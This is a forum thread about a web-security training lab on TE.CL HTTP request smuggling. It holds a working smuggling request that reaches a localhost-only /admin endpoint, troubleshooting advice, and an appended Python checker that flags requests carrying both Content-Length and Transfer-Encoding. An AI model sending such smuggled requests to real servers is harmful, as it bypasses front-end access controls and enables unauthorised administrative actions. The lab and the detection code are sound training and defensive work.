Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability
Lab doesn't seem to be working for me, even when I follow the solution. Getting timeout errors. This is what I'm trying to use: host URL is correct, target is correct, update content length is not checkmarked, and I keep getting a timeout error after 10000ms. Having similar issues in other labs of this category.
POST / HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
Hi,
I have just worked through this lab and was able to solve it using the instructions provided.
Have you added two carriage returns (pressing the Enter key twice) after the final 0 in the request that you have created in Burp Repeater? This is specified in the solution but some people do miss it.
Turns out, I thought that admin panel access would be reflected on the admin webpage; turns out it wasn't. You just had to assume you had admin access, since no errors were returned. I went ahead and ran the code to delete Carlos and it went through!
Hi Evan,
I am glad that you were able to solve your issue.
Please let us know if you need any further assistance with anything in the future.
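
The framing issue discussed in this thread, as an added example that is not part of the original posts: a Python check that flags a request carrying both Content-Length and Transfer-Encoding, shows what each framing leaves on the connection, and reports a chunked body whose terminating chunk is incomplete (the missing blank line after the final 0). The sample request is constructed to match the shape of the one above, the host `lab.example` is a placeholder, and the parser assumes no chunked trailers.

```python
CRLF = b"\r\n"

def split_head(raw):
    """Split a raw request into (header dict with lower-cased names, body bytes)."""
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body

def chunked_length(body):
    """Bytes a chunked parser consumes, or None if the terminating chunk is incomplete."""
    pos = 0
    try:
        while True:
            eol = body.index(CRLF, pos)
            size = int(body[pos:eol].split(b";")[0], 16)
            pos = eol + 2
            if size == 0:
                # Assumption: no trailers, so the end is "0\r\n" plus one empty line.
                return pos + 2 if body[pos:pos + 2] == CRLF else None
            pos += size + 2  # chunk data plus its CRLF
    except ValueError:
        return None  # ran out of data or malformed chunk size

def analyse(raw):
    headers, body = split_head(raw)
    cl = headers.get(b"content-length", [])
    chunked = any(b"chunked" in v.lower() for v in headers.get(b"transfer-encoding", []))
    report = {"ambiguous": bool(cl) and chunked}  # both framings present: reject or log
    if cl:
        report["left_after_cl"] = body[int(cl[0]):]  # what a Content-Length reader leaves behind
    if chunked:
        report["chunked_len"] = chunked_length(body)
    return report

# Constructed sample with the same shape as the request in the thread.
INNER = (b"POST /admin HTTP/1.1\r\nHost: localhost\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 15\r\n\r\nx=1")
HEAD = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Content-length: 4\r\nTransfer-Encoding: chunked\r\n\r\n")
COMPLETE = HEAD + b"%x\r\n" % len(INNER) + INNER + b"\r\n0\r\n\r\n"
TRUNCATED = COMPLETE[:-2]  # final empty line missing

if __name__ == "__main__":
    for name, req in (("complete", COMPLETE), ("truncated", TRUNCATED)):
        print(name, analyse(req))
```

RFC 7230 section 3.3.3 says a message with both header fields ought to be handled as an error, so the `ambiguous` flag is the condition to reject or alert on at the front end.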